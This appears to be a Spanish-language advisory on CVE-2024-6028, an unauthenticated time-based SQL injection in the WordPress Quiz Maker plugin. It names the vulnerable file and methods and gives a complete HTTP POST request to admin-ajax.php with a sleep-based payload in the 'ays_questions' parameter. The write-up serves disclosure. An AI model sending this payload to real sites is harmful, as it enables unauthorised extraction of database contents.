
CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Inyección SQL no autenticada mediante el parámetro 'ays_questions'
CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Inyección SQL no autenticada a través del parámetro 'ays_questions'
El plugin Quiz Maker para WordPress es vulnerable a una inyección SQL basada en tiempo a través del parámetro 'ays_questions' en todas las versiones hasta la 6.5.8.3 inclusive, debido a un escape insuficiente del parámetro proporcionado por el usuario y a la falta de preparación suficiente en la consulta SQL existente. Esto permite a atacantes no autenticados añadir consultas SQL adicionales a consultas ya existentes, que pueden utilizarse para extraer información sensible de la base de datos.
Archivo: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php
Clase: Quiz_Maker_Public
Flujo de trabajo: método ays_finish_quiz -> método get_questions_categories image image image
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz
image